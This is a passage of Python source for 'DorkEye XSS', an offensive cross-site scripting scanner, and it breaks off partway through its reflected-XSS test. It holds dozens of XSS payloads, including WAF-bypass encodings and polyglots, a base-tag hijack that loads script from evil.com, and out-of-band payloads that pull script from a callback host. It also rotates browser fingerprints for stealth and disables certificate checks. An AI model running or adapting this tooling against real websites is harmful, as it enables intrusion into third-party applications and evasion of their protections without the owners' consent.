"""
DorkEye XSS  v5.1
═══════════════════════════════════════════════════════════════
Multi-method XSS testing engine for DorkEye Project

Detection methods:
  1. reflected  — inject payloads into GET params; check for unescaped reflection
  2. stored     — POST payload per individual param, then refetch and check for marker
  3. dom        — static analysis of JS source-to-sink patterns (inline + external scripts)
  4. header     — inject marker into X-Forwarded-For / Referer / User-Agent / etc.

Changes vs v5.0:
  [NEW-1]  Probe performance: sample 8 KB + fast-path length diff (was full O(n²) difflib)
  [NEW-2]  Reflected payloads: +14 (template injection, mXSS, polyglot, meta, object/embed,
           base-tag hijack, prototype pollution, tabindex/focus, srcdoc sandbox bypass)
  [NEW-3]  Bypass payloads: +10 (null-byte, void operator, self-closing SVG namespace,
           form-action javascript:, input[type=image], RPO, content-sniff bypass)
  [NEW-4]  DOM sources: +8 (localStorage, sessionStorage, postMessage, fetch, WebSocket,
           XHR.responseText, document.cookie, getAttribute)
  [NEW-5]  DOM sinks: +7 (createContextualFragment, DOMParser, window.open, importScripts,
           href=, form action=, srcdoc=)
  [NEW-6]  DOM analysis: tokenise by both newline AND semicolon to handle minified JS bundles
  [NEW-7]  Header injection: 7-payload list instead of single fixed payload
  [NEW-8]  Stored XSS: CSRF-token absence noted in result message
  [NEW-9]  Import granularity: per-symbol fallback instead of all-or-nothing block

  Author: xPloits3c I.C.W.T | https://github.com/xPloits3c/DorkEye
"""

import re
import time
import random
import difflib
import threading
from enum import Enum
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, parse_qs, urlencode

import requests
import urllib3
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

# ── [NEW-9] Granular per-symbol import with individual fallbacks ──────────────
# Instead of a single all-or-nothing try/except, each symbol has its own
# fallback so a partial sqli import does not silently disable everything.

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

_SHARED_IMPORTS = False

try:
    from sqli import HTTPFingerprintRotator as _SqliRotator
    _HAS_ROTATOR = True
except ImportError:
    _HAS_ROTATOR = False

try:
    from sqli import CircuitBreaker as _SqliCircuitBreaker
    _HAS_CIRCUIT = True
except ImportError:
    _HAS_CIRCUIT = False

try:
    from sqli import WAF_SIGNATURES as _SqliWafSigs
    _HAS_WAF_SIGS = True
except ImportError:
    _HAS_WAF_SIGS = False

try:
    from sqli import _interruptible_sleep as _sqli_sleep
    _HAS_SLEEP = True
except ImportError:
    _HAS_SLEEP = False

try:
    import sqli as _sqli_module
    _SHARED_IMPORTS = True
except ImportError:
    _sqli_module = None

# ── Interrupt flags — mirrored from dorkeye.py signal handler ────────────────

_exit_requested: bool = False
_skip_current:   bool = False

_CONNECT_TIMEOUT = 4
_DEFAULT_READ    = 8

# Cache sqli module reference at import time
def _get_exit_flag() -> bool:
    """Return True if either the local or shared (sqli) exit flag is set."""
    if _exit_requested:
        return True
    if _sqli_module is not None:
        return _sqli_module._exit_requested
    return False

def _get_skip_flag() -> bool:
    """Return True if either the local or shared skip flag is set."""
    if _skip_current:
        return True
    if _sqli_module is not None:
        return _sqli_module._skip_current
    return False

def _safe_sleep(seconds: float) -> None:
    """Sleep interruptibly — use shared helper if available, else manual loop."""
    if _HAS_SLEEP:
        _sqli_sleep(seconds)
    else:
        elapsed = 0.0
        step    = 0.25
        while elapsed < seconds:
            if _get_exit_flag() or _get_skip_flag():
                return
            time.sleep(min(step, seconds - elapsed))
            elapsed += step

# ── Fallback WAF_SIGNATURES when sqli is not importable ──────────────────────

_WAF_SIGNATURES_FALLBACK: Dict[str, List[str]] = {
    "cloudflare":  ["cf-ray", "__cfduid", "cloudflare", "attention required! | cloudflare"],
    "modsecurity": ["mod_security", "modsecurity", "406 not acceptable", "not acceptable!"],
    "wordfence":   ["wordfence", "generated by wordfence"],
    "sucuri":      ["x-sucuri-id", "sucuri website firewall", "access denied - sucuri"],
    "imperva":     ["x-iinfo", "incapsula incident", "*incap_ses*"],
    "akamai":      ["akamai", "x-akamai-transformed", "reference #18"],
    "f5_bigip":    ["x-waf-event-info", "bigipserver", "the requested url was rejected"],
    "barracuda":   ["barra_counter_session", "barracuda"],
    "fortiweb":    ["fortigate", "fortiweb"],
    "aws_waf":     ["x-amzn-requestid", "awselb", "forbidden - aws waf"],
    "denyall":     ["denyall", "x-denyall"],
    "reblaze":     ["x-reblaze-protection"],
}

_ACTIVE_WAF_SIGS = _SqliWafSigs if _HAS_WAF_SIGS else _WAF_SIGNATURES_FALLBACK

# ══════════════════════════════════════════════════════════════
#  XSSConfidence
# ══════════════════════════════════════════════════════════════

class XSSConfidence(Enum):
    """Confidence levels for XSS findings (none → low → medium → high → critical)."""
    NONE     = "none"
    LOW      = "low"
    MEDIUM   = "medium"
    HIGH     = "high"
    CRITICAL = "critical"

_CONF_RANK = {
    XSSConfidence.CRITICAL.value: 4,
    XSSConfidence.HIGH.value:     3,
    XSSConfidence.MEDIUM.value:   2,
    XSSConfidence.LOW.value:      1,
    XSSConfidence.NONE.value:     0,
}

# ══════════════════════════════════════════════════════════════
#  Parameter priority tables
# ══════════════════════════════════════════════════════════════

_XSS_HIGH_PRIORITY: frozenset = frozenset({
    "q", "query", "search", "s", "keyword", "kw", "term", "find",
    "name", "user", "username", "message", "msg", "comment", "text",
    "input", "value", "data", "content", "body", "title", "description",
    "subject", "note", "info",
    "redirect", "url", "next", "return", "callback", "ref", "goto",
    "redir", "dest", "target", "location",
})

_XSS_MEDIUM_PRIORITY: frozenset = frozenset({
    "id", "page", "cat", "category", "type", "lang", "language",
    "filter", "tag", "label", "topic", "section", "email", "mail",
    "first", "last", "city", "country", "region",
})

# ── RFC-1918 / link-local CIDR prefixes used in SSRF guard ───────────────────

_PRIVATE_IP_RE = re.compile(
    r"^(?:"
    r"10\."                           # 10.0.0.0/8
    r"|172\.(?:1[6-9]|2\d|3[01])\."  # 172.16.0.0/12
    r"|192\.168\."                    # 192.168.0.0/16
    r"|169\.254\."                    # link-local
    r"|127\."                         # loopback
    r"|::1$"                          # IPv6 loopback
    r"|fc[0-9a-f]{2}:"                # IPv6 ULA
    r")"
)

# ══════════════════════════════════════════════════════════════
#  Fallback CircuitBreaker
# ══════════════════════════════════════════════════════════════

class _FallbackCircuitBreaker:
    """Minimal CircuitBreaker used when sqli cannot be imported."""

    def __init__(self):
        self._dead: set = set()

    def _key(self, url: str) -> str:
        p = urlparse(url)
        return f"{p.scheme}://{p.netloc}"

    def is_dead(self, url: str) -> bool:
        return self._key(url) in self._dead

    def mark_dead(self, url: str) -> None:
        self._dead.add(self._key(url))

    def reset(self) -> None:
        self._dead.clear()

# ══════════════════════════════════════════════════════════════
#  Fallback HTTPFingerprintRotator
# ══════════════════════════════════════════════════════════════

class _FallbackFingerprintRotator:
    """Minimal rotator used when sqli cannot be imported."""

    _AGENTS = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 "
        "(KHTML, like Gecko) Version/17.1 Safari/605.1.15",
    ]

    def get_random(self) -> None:
        self._ua = random.choice(self._AGENTS)

    def get_next(self) -> None:
        self.get_random()

    def build_headers(self, referer: str = "") -> Dict[str, str]:
        ua = getattr(self, "_ua", self._AGENTS[0])
        headers = {
            "User-Agent":      ua,
            "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Connection":      "keep-alive",
        }
        if referer:
            headers["Referer"] = referer
        return headers

# ══════════════════════════════════════════════════════════════
#  XSSDetector
# ══════════════════════════════════════════════════════════════

class XSSDetector:
    """
    Multi-method XSS detector for DorkEye.

    Detection methods (run in order per request):
      1. reflected  — GET param injection + unescaped-reflection check
      2. stored     — per-param POST injection, refetch via GET, check for marker
      3. dom        — static JS source-to-sink analysis (inline + external scripts)
      4. header     — inject marker into reflected HTTP request headers
    """

    # ── Unique marker ─────────────────────────────────────────────────────────
    _MARKER = "DEXSS7x"

    # ── Reflected payloads ────────────────────────────────────────────────────
    _REFLECTED_PAYLOADS: List[str] = [
        # Classic script injection
        "<script>alert('DEXSS7x')</script>",
        '"><script>alert("DEXSS7x")</script>',
        "'><script>alert('DEXSS7x')</script>",
        "<script>alert`DEXSS7x`</script>",
        "<script type='text/javascript'>alert('DEXSS7x')</script>",

        # Image / media onerror
        '<img src=x onerror=alert("DEXSS7x")>',
        '"><img src=x onerror=alert("DEXSS7x")>',
        "<video src=x onerror=alert('DEXSS7x')>",
        "<audio src=x onerror=alert('DEXSS7x')>",
        "<source src=x onerror=alert('DEXSS7x')>",

        # SVG / MathML
        "<svg/onload=alert('DEXSS7x')>",
        '"><svg onload=alert("DEXSS7x")>',
        "<svg><script>alert('DEXSS7x')</script></svg>",
        "<svg><animate onbegin=alert('DEXSS7x') attributeName=x dur=1s>",
        "<math><mtext></mtext><script>alert('DEXSS7x')</script></math>",

        # HTML5 autofocus event handlers
        "<input autofocus onfocus=alert('DEXSS7x')>",
        "<select autofocus onfocus=alert('DEXSS7x')>",
        "<textarea autofocus onfocus=alert('DEXSS7x')>",
        "<details open ontoggle=alert('DEXSS7x')>",

        # Body / iframe / form
        '<body onload=alert("DEXSS7x")>',
        '<iframe srcdoc="<script>alert(\'DEXSS7x\')</script>">',
        "<form><button formaction=javascript:alert('DEXSS7x')>X</button></form>",

        # Break out of quoted HTML attribute
        '" onmouseover="alert(\'DEXSS7x\')" x="',
        "' onmouseover='alert(\"DEXSS7x\")' x='",
        '" onfocus="alert(\'DEXSS7x\')" autofocus="',

        # Href javascript: protocol
        "<a href=javascript:alert('DEXSS7x')>click</a>",

        # JS context escapes
        "';alert('DEXSS7x')//",
        '";alert("DEXSS7x")//',
        "`<script>alert('DEXSS7x')</script>`",

        # ── [NEW-2] Additional reflected payloads ─────────────────────────────

        # Template / server-side expression injection
        "${alert('DEXSS7x')}",
        "{{constructor.constructor('alert(\"DEXSS7x\")')()}}",   # Angular/Vue SSTI
        "#{alert('DEXSS7x')}",                                    # Ruby/Thymeleaf

        # Mutation XSS (mXSS) — survives old DOMPurify / innerHTML round-trips
        "<noscript><p title=\"</noscript><img src=x onerror=alert('DEXSS7x')\">",
        "<listing><img src=\"</listing><img src=x onerror=alert('DEXSS7x')\">",

        # CSS injection
        "<link rel=stylesheet href=javascript:alert('DEXSS7x')>",

        # Polyglot — valid in HTML attribute, JS string, and bare HTML simultaneously
        (
            "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert('DEXSS7x') )//"
            "%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>"
            "\\x3csVg/<sVg/oNloAd=alert('DEXSS7x')//\\x3e"
        ),

        # Prototype pollution via XSS gadget
        "<script>Object.prototype.x=alert('DEXSS7x')</script>",

        # Noscript fallback
        "<noscript><img src=x onerror=alert('DEXSS7x')></noscript>",

        # Base tag hijack
        "<base href=//evil.com/><script src=/x.js></script>",

        # Meta refresh to javascript:
        "<meta http-equiv=refresh content='0;url=javascript:alert(\"DEXSS7x\")'>",

        # Object / embed (legacy browsers, still present in intranet targets)
        "<object data=javascript:alert('DEXSS7x')>",
        "<embed src=javascript:alert('DEXSS7x')>",

        # Tabindex + focus event (no click required)
        "<div tabindex=1 onfocus=alert('DEXSS7x') id=x></div><script>x.focus()</script>",

        # Srcdoc with sandbox allow-scripts bypass
        '<iframe srcdoc="&lt;img src=x onerror=alert(1)&gt;" sandbox="allow-scripts">',
    ]

    # ── WAF-bypass encoding variants ──────────────────────────────────────────
    _BYPASS_PAYLOADS: List[str] = [
        # Case mixing
        "<ScRiPt>alert('DEXSS7x')</sCrIpT>",
        "<iMg src=x oNeRrOr=alert('DEXSS7x')>",

        # HTML entity / unicode encoding
        "<svg/onload=&#97;lert('DEXSS7x')>",
        "&#60;script&#62;alert('DEXSS7x')&#60;/script&#62;",
        "\\u003Cscript\\u003Ealert('DEXSS7x')\\u003C/script\\u003E",

        # URL encoding
        "%3Cscript%3Ealert('DEXSS7x')%3C/script%3E",
        "%3Cimg+src%3Dx+onerror%3Dalert('DEXSS7x')%3E",

        # Double URL encoding
        "%253Cscript%253Ealert('DEXSS7x')%253C/script%253E",

        # Comment insertion (breaks simple keyword filters)
        "<scr<!---->ipt>alert('DEXSS7x')</scr<!---->ipt>",
        "<img src=x o/**/nerror=alert('DEXSS7x')>",

        # Tab / newline in tag (bypasses simple regex WAFs)
        "<img\tsrc=x\tonerror=alert('DEXSS7x')>",
        "<img\nsrc=x\nonerror=alert('DEXSS7x')>",

        # Backtick attribute (legacy IE)
        "<img src=`x` onerror=`alert('DEXSS7x')`>",

        # Data URI iframe
        "<iframe src=\"data:text/html,<script>alert('DEXSS7x')</script>\">",

        # SVG image href with onerror
        "<svg><image href=\"data:,\" onerror=alert('DEXSS7x')>",

        # CSS expression (legacy IE)
        "<div style=\"width:expression(alert('DEXSS7x'))\">",

        # ── [NEW-3] Additional bypass payloads ────────────────────────────────

        # Null byte injection — some WAFs stop scanning at \x00
        "<scr\x00ipt>alert('DEXSS7x')</scr\x00ipt>",
        "<img\x00src=x onerror=alert('DEXSS7x')>",

        # Void operator — avoids alert() pattern matching in some WAFs
        "<script>void(alert('DEXSS7x'))</script>",
        "<img src=x onerror=void(alert('DEXSS7x'))>",

        # Self-closing SVG with explicit namespace (stricter parsers)
        "<svg xmlns='http://www.w3.org/2000/svg' onload=alert('DEXSS7x')/>",

        # Form action with javascript: URI
        "<form action=javascript:alert('DEXSS7x')><button>X</button></form>",

        # Input type=image — often overlooked by filters
        "<input type=image src=x onerror=alert('DEXSS7x')>",

        # Content-sniffing bypass (marker inside comment — sniffed browsers execute)
        "<!--<script>alert('DEXSS7x')</script>-->",

        # RPO (Relative Path Overwrite) — changes base for relative script loads
        "/%2F..%2F..%2Fevil.js",

        # Script tag with rare charset (confuses some parsers)
        '<script charset="x-mac-farsi">\xd0)</script>',
    ]

    _STORED_PAYLOADS: List[str] = [
        "<script>alert('DEXSS7x')</script>",
        '<img src=x onerror=alert("DEXSS7x")>',
        "<svg/onload=alert('DEXSS7x')>",
        "<input autofocus onfocus=alert('DEXSS7x')>",
        "<details open ontoggle=alert('DEXSS7x')>",
    ]

    # ── DOM sources ───────────────────────────────────────────────────────────
    _DOM_SOURCES: List[str] = [
        # Original sources
        r"location\.hash",
        r"location\.search",
        r"location\.href",
        r"document\.URL",
        r"document\.documentURI",
        r"document\.referrer",
        r"window\.name",
        r"history\.state",

        # [NEW-4] Additional sources
        r"localStorage\.getItem",          # Web Storage as source
        r"sessionStorage\.getItem",
        r"postMessage",                    # cross-origin message event
        r"XMLHttpRequest\.responseText",   # AJAX response injected into DOM
        r"fetch\s*\(",                     # fetch() response piped to DOM
        r"document\.cookie",              # cookie value reflected in DOM
        r"\.getAttribute\s*\(",           # DOM attribute read → sink
        r"WebSocket",                     # WebSocket data → DOM
    ]

    # ── DOM sinks ─────────────────────────────────────────────────────────────
    _DOM_SINKS: List[str] = [
        # Original sinks
        r"document\.write\s*\(",
        r"document\.writeln\s*\(",
        r"\.innerHTML\s*=",
        r"\.outerHTML\s*=",
        r"\beval\s*\(",
        r"setTimeout\s*\(\s*['\"]",
        r"setInterval\s*\(\s*['\"]",
        r"location\.href\s*=",
        r"location\.assign\s*\(",
        r"location\.replace\s*\(",
        r"insertAdjacentHTML\s*\(",
        r'\.setAttribute\s*\(\s*[\'"](?:src|href|on\w+)[\'"]',
        r"document\.createElement\s*\(\s*['\"]script['\"]",
        r"\.src\s*=\s*(?:location|window)",

        # [NEW-5] Additional sinks
        r"\.createContextualFragment\s*\(",  # Range API — dangerous sink
        r"DOMParser",                        # parseFromString with text/html
        r"window\.open\s*\(",               # window.open with javascript: href
        r"importScripts\s*\(",              # Web Worker — imports external script
        r"\.href\s*=",                      # anchor/location href assignment
        r"\.action\s*=",                    # form action reassignment
        r"\.srcdoc\s*=",                    # iframe srcdoc assignment
    ]

    # ── [FIX-8] Safe DOM patterns — lines matching these are excluded ─────────
    _DOM_SAFE_PATTERNS: List[str] = [
        r"//.*(?:analytics|tracking|google-analytics|gtag|ga\()",
        r"document\.write\s*\(\s*['\"]",       # write with static string literal
        r"innerHTML\s*=\s*['\"]",               # innerHTML assigned a static string
        r"//\s*(?:TODO|FIXME|NOTE|eslint)",     # code comments only
        r"/\*[\s\S]*?\*/",                      # block comments (multi-line safe)
    ]

    # ── Patterns indicating HTML-encoded (safe) reflection ────────────────────
    _ENCODED_MARKERS: List[str] = [
        "&lt;script",
        "&lt;img",
        "&lt;svg",
        "&lt;iframe",
        "&lt;details",
        "&lt;body",
        "&lt;input",
        "&lt;video",
        "&lt;audio",
        "&#60;",
        "&#x3c;",
        "%3Cscript",
        "\\u003C",
        "&amp;lt;",
        "\\x3c",
    ]

    # ── Non-HTML content types — HTML injection is meaningless ────────────────
    _NON_HTML_CONTENT_TYPES: Tuple[str, ...] = (
        "application/json",
        "application/xml",
        "text/xml",
        "text/plain",
        "application/javascript",
        "text/csv",
        "application/octet-stream",
    )

    # ── [NEW-7] Header injection targets and payload variants ─────────────────
    _HEADER_INJECTION_TARGETS: List[str] = [
        "X-Forwarded-For",
        "Referer",
        "User-Agent",
        "X-Forwarded-Host",
        "X-Original-URL",
    ]

    # [NEW-7] Multiple header payloads instead of a single fixed one.
    # WAFs almost universally block <script> in headers — softer variants
    # improve detection against targets that reflect headers in error pages
    # or debug output without heavy filtering.
    _HEADER_PAYLOADS: List[str] = [
        f"<script>alert('DEXSS7x')</script>",
        f"<img src=x onerror=alert('DEXSS7x')>",
        f"<svg/onload=alert('DEXSS7x')>",
        f"'DEXSS7x'",                              # single-quote context
        f'"DEXSS7x"',                              # double-quote context
        f"DEXSS7x<br>",                            # soft injection probe
        f"javascript:alert('DEXSS7x')",            # href/src reflection
    ]

    # ── Max size (bytes) for a single fetched external JS file ────────────────
    _MAX_EXTERNAL_SCRIPT_BYTES: int = 512_000   # 500 KB cap

    # ── [NEW-1] Probe sample size ─────────────────────────────────────────────
    _PROBE_SAMPLE_BYTES: int = 8_192            # 8 KB for difflib comparison

    def __init__(
        self,
        stealth:  bool = False,
        timeout:  int  = _DEFAULT_READ,
        xss_type: str  = "all",
        oob_url:  Optional[str] = None,
    ):
        """
        Initialise with stealth flag, timeout, XSS types to test, optional OOB URL.

        Args:
            stealth:   Add extra delays between requests.
            timeout:   Read timeout in seconds.
            xss_type:  One of "reflected", "stored", "dom", "header", "all".
            oob_url:   Callback URL for blind/OOB XSS payloads (e.g. interactsh endpoint).
        """
        self.stealth          = stealth
        self.read_timeout     = timeout
        self.xss_type         = xss_type
        self.oob_url          = oob_url

        # [NEW-9] Use shared implementation when available, fall back gracefully
        self.circuit_breaker     = (
            _SqliCircuitBreaker() if _HAS_CIRCUIT else _FallbackCircuitBreaker()
        )
        self.fingerprint_rotator = (
            _SqliRotator() if _HAS_ROTATOR else _FallbackFingerprintRotator()
        )

        self._session   = self._build_session()
        self._status_cb = None

        # OOB payloads
        self._oob_payloads: List[str] = []
        if oob_url:
            self._oob_payloads = [
                f"<script src=\"//{oob_url}/{self._MARKER}\"></script>",
                f"<img src=\"//{oob_url}/{self._MARKER}\">",
                f"'\"><script src=\"//{oob_url}/{self._MARKER}\"></script>",
            ]

    def _cb(self, msg: str) -> None:
        """Send a phase/status message to the registered callback (no-op if not set)."""
        if callable(self._status_cb):
            try:
                self._status_cb(msg)
            except Exception:
                pass

    # ──────────────────────────────────────────────────────────────────────────
    #  Session
    # ──────────────────────────────────────────────────────────────────────────

    def _build_session(self) -> requests.Session:
        """Build a requests.Session with retry adapter (backoff on 429/5xx)."""
        session = requests.Session()
        retry   = Retry(
            total            = 2,
            backoff_factor   = 0.5,
            status_forcelist = [429, 500, 502, 503, 504],
            allowed_methods  = ["GET", "POST"],
            raise_on_status  = False,
        )
        adapter = HTTPAdapter(max_retries=retry)
        session.mount("http://",  adapter)
        session.mount("https://", adapter)
        return session

    def _timeout(self, extra: float = 0) -> Tuple[int, float]:
        """Return (connect_timeout, read_timeout + extra) tuple."""
        return (_CONNECT_TIMEOUT, self.read_timeout + extra)

    # ──────────────────────────────────────────────────────────────────────────
    #  HTTP helpers
    # ──────────────────────────────────────────────────────────────────────────

    def _run_interruptible(self, fn, total_timeout: float, on_connect_error=None):
        """Run fn() in a daemon thread; return its result or None on timeout/interrupt."""
        _POLL         = 0.1
        result_holder = [None]
        exc_holder    = [None]
        done_event    = threading.Event()

        def _worker():
            try:
                result_holder[0] = fn()
            except (requests.exceptions.ConnectTimeout,
                    requests.exceptions.ConnectionError) as exc:
                exc_holder[0] = exc
            except Exception:
                pass
            finally:
                done_event.set()

        threading.Thread(target=_worker, daemon=True).start()

        deadline = total_timeout + 1.0
        elapsed  = 0.0
        while elapsed < deadline:
            if _get_exit_flag() or _get_skip_flag():
                return None
            if done_event.wait(timeout=_POLL):
                if exc_holder[0] is not None and on_connect_error:
                    on_connect_error()
                return result_holder[0]
            elapsed += _POLL

        return None

    def _get(
        self,
        url: str,
        extra_read: float = 0,
        extra_headers: Optional[Dict[str, str]] = None,
    ) -> Optional[requests.Response]:
        """
        Perform a GET request with rotated fingerprint headers.

        Args:
            extra_headers: Optional dict merged into fingerprint headers (used by
                           header-injection tests to override specific fields).
        """
        if self.circuit_breaker.is_dead(url):
            return None

        self.fingerprint_rotator.get_random()
        headers = self.fingerprint_rotator.build_headers()

        if extra_headers:
            headers.update(extra_headers)

        timeout = self._timeout(extra_read)

        def _do():
            return self._session.get(
                url,
                headers         = headers,
                timeout         = timeout,
                verify          = False,
                allow_redirects = True,
            )

        total = _CONNECT_TIMEOUT + self.read_timeout + extra_read
        return self._run_interruptible(
            _do,
            total_timeout    = total,
            on_connect_error = lambda: self.circuit_breaker.mark_dead(url),
        )

    def _post(self, url: str, data: Dict) -> Optional[requests.Response]:
        """Perform a POST with form data using rotated fingerprint headers."""
        if self.circuit_breaker.is_dead(url):
            return None

        self.fingerprint_rotator.get_random()
        headers = self.fingerprint_rotator.build_headers()
        headers["Content-Type"] = "application/x-www-form-urlencoded"

        timeout = self._timeout()

        def _do():
            return self._session.post(
                url,
                data            = data,
                headers         = headers,
                timeout         = timeout,
                verify          = False,
                allow_redirects = True,
            )

        total = _CONNECT_TIMEOUT + self.read_timeout
        return self._run_interruptible(
            _do,
            total_timeout    = total,
            on_connect_error = lambda: self.circuit_breaker.mark_dead(url),
        )

    # ──────────────────────────────────────────────────────────────────────────
    #  Utilities
    # ──────────────────────────────────────────────────────────────────────────

    def _extract_params(self, url: str) -> Dict[str, str]:
        """Parse and return GET query params as a flat {name: first_value} dict."""
        try:
            params = parse_qs(urlparse(url).query)
            return {k: (v[0] if isinstance(v, list) else v) for k, v in params.items()}
        except Exception:
            return {}

    def _inject_param(self, url: str, param: str, payload: str) -> str:
        """Return url with param replaced by payload. Preserves fragment."""
        parsed = urlparse(url)
        params = parse_qs(parsed.query)
        if param not in params:
            return url
        params[param] = [payload]
        new_query = urlencode(params, doseq=True)
        rebuilt   = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{new_query}"
        if parsed.fragment:
            rebuilt += f"#{parsed.fragment}"
        return rebuilt

    def _prioritize_params(self, params: Dict[str, str]) -> List[str]:
        """Sort params by XSS attack-surface priority (high → medium → low)."""
        high, medium, low = [], [], []
        for param in params:
            p_lower = param.lower()
            if p_lower in _XSS_HIGH_PRIORITY:
                high.append(param)
            elif p_lower in _XSS_MEDIUM_PRIORITY:
                medium.append(param)
            else:
                low.append(param)
        return high + medium + low

    # ──────────────────────────────────────────────────────────────────────────
    #  Content-type helper
    # ──────────────────────────────────────────────────────────────────────────

    def _is_response_html(self, response: requests.Response) -> bool:
        """Return True if the response is likely HTML."""
        ct = response.headers.get("Content-Type", "").lower().split(";")[0].strip()
        if not ct:
            return True  # unknown — assume HTML to avoid missing vulns
        for non_html in self._NON_HTML_CONTENT_TYPES:
            if ct == non_html or ct.startswith(non_html):
                return False
        return "html" in ct or "xhtml" in ct

    # ──────────────────────────────────────────────────────────────────────────
    #  SSRF guard
    # ──────────────────────────────────────────────────────────────────────────

    def _is_safe_external_url(self, src: str) -> bool:
        """
        Return True if src is safe to fetch as an external JS resource.

        Blocks loopback, RFC-1918, link-local, IPv6 ULA, bare hostnames,
        and data:/file:/javascript: URIs.
        """
        try:
            src_stripped = src.strip()
            scheme = src_stripped.split(":")[0].lower()
            if scheme in ("data", "file", "javascript"):
                return False

            if src_stripped.startswith("//"):
                parsed = urlparse("https:" + src_stripped)
            else:
                parsed = urlparse(src_stripped)

            host = (parsed.hostname or "").lower().strip()
            if not host:
                return False
            if "." not in host and ":" not in host:
                return False
            if _PRIVATE_IP_RE.match(host):
                return False

            return True
        except Exception:
            return False

    # ──────────────────────────────────────────────────────────────────────────
    #  Reflection check
    # ──────────────────────────────────────────────────────────────────────────

    def _is_reflected_unescaped(self, body: str, payload: str) -> bool:
        """
        Return True if the payload marker appears in body and is NOT HTML-encoded
        in ANY of its occurrences.

        Checks ALL occurrences; rejects reflection inside unclosed HTML comments
        and inside <script> blocks using Unicode escaping.
        """
        if self._MARKER not in body:
            return False

        start = 0
        while True:
            marker_idx = body.find(self._MARKER, start)
            if marker_idx == -1:
                break

            ctx_start = max(0, marker_idx - 60)
            ctx_end   = marker_idx + len(self._MARKER) + 60
            context   = body[ctx_start:ctx_end]

            # Check HTML-encoded variants in local context
            encoded = any(
                enc.lower() in context.lower()
                for enc in self._ENCODED_MARKERS
            )
            if encoded:
                start = marker_idx + 1
                continue

            # Reject reflection inside an unclosed HTML comment
            comment_open = body.rfind("<!--", 0, marker_idx)
            if comment_open != -1:
                closing_before = body.find("-->", comment_open, marker_idx)
                if closing_before == -1:
                    closing_after = body.find("-->", marker_idx)
                    if closing_after != -1:
                        start = marker_idx + 1
                        continue

            # Reject when marker is inside a <script> block using Unicode escaping
            script_open  = body.rfind("<script", 0, marker_idx)
            script_close = body.find("</script>", marker_idx)
            if script_open != -1 and script_close != -1:
                local_ctx = body[max(script_open, marker_idx - 30): marker_idx + 30]
                if "\\u003C" in local_ctx or "\\u003c" in local_ctx:
                    start = marker_idx + 1
                    continue

            return True

        return False

    # ──────────────────────────────────────────────────────────────────────────
    #  Full-tag structure verification (anti false-positive)
    # ──────────────────────────────────────────────────────────────────────────

    def _payload_structure_present(self, body: str, payload: str) -> bool:
        """
        Verify that the core dangerous HTML structure of the payload survives
        in the body — eliminates cases where angle brackets are stripped but
        the marker text still appears in an error message.

        Event-handler check inspects a narrow window around the marker position
        instead of the entire body, preventing false positives from unrelated
        onclick/onsubmit attributes on normal pages.
        """
        pl = payload.lower()

        if "<script" in pl:
            return "&lt;script" not in body.lower() and "<script" in body.lower()

        if any(ev in pl for ev in ("onerror=", "onload=", "onfocus=", "ontoggle=",
                                   "onmouseover=", "onbegin=")):
            marker_idx = body.lower().find(self._MARKER.lower())
            if marker_idx == -1:
                return False
            window = body[max(0, marker_idx - 80): marker_idx + 80]
            return bool(re.search(r"on\w+=", window, re.IGNORECASE))

        if "javascript:" in pl:
            return "javascript:" in body.lower()

        return True

    # ──────────────────────────────────────────────────────────────────────────
    #  CSP / WAF detection
    # ──────────────────────────────────────────────────────────────────────────

    def _detect_csp(self, response: requests.Response) -> bool:
        """Return True if response carries a non-trivial Content-Security-Policy."""
        csp = response.headers.get("Content-Security-Policy", "")
        if not csp:
            return False
        if "script-src" in csp.lower() and "unsafe-inline" not in csp.lower():
            return True
        if "default-src" in csp.lower() and "unsafe-inline" not in csp.lower():
            return True
        return False

    def _detect_waf(self, response: requests.Response) -> Optional[str]:
        """Scan response headers and body for known WAF signatures."""
        status      = response.status_code
        body_snip   = response.text[:1500].lower()
        hdrs_keys   = {k.lower() for k in response.headers}
        hdrs_values = " ".join(v.lower() for v in response.headers.values())

        for waf_name, sigs in _ACTIVE_WAF_SIGS.items():
            for sig in sigs:
                if sig in hdrs_keys or sig in hdrs_values or sig in body_snip:
                    return waf_name

        if status in (403, 406, 419, 429) and len(response.text) < 600:
            return "generic_waf"

        return None

    # ──────────────────────────────────────────────────────────────────────────
    #  [NEW-1] Parameter pre-screening probe — performance overhaul
    # ──────────────────────────────────────────────────────────────────────────

    def _probe_parameter(self, url: str, param_name: str, baseline_body: str) -> bool:
        """
        Return True if param_name shows response variation when injected with a probe.
        Skips inert parameters to avoid wasting the heavy payload set on them.

        [NEW-1] Performance improvements vs v5.0:
          - Fast-path: if response length differs by >50 bytes, declare variation
            immediately without running difflib at all.
          - difflib comparison limited to first _PROBE_SAMPLE_BYTES (8 KB) of each
            body instead of the full document. O(n²) → effectively O(1) for large pages.
        """
        if self.circuit_breaker.is_dead(url):
            return False

        test_url = self._inject_param(url, param_name, "1'\"<>")
        r        = self._get(test_url)
        if r is None:
            return False

        # Fast-path: significant length difference → variation confirmed
        if abs(len(baseline_body) - len(r.text)) > 50:
            return True

        # Slow-path: compare sampled slices only
        b1  = baseline_body[: self._PROBE_SAMPLE_BYTES]
        b2  = r.text[: self._PROBE_SAMPLE_BYTES]
        sim = difflib.SequenceMatcher(None, b1, b2).ratio()
        return sim < 0.97

    # ──────────────────────────────────────────────────────────────────────────
    #  [1] Reflected XSS
    # ──────────────────────────────────────────────────────────────────────────

    def _test_reflected(self, url: str, params: Dict[str, str]) -> Dict:
        """
        Inject payloads into GET params and check for unescaped reflection.

        Includes content-type gate and full-tag structure verification to
        minimise false positives.
        """
        result = {
            "type":         "reflected",
            "vulnerable":   False,
            "confidence":   XSSConfidence.NONE.value,
            "parameters":   [],
            "payload":      None,
            "evidence":     [],
            "waf":          None,
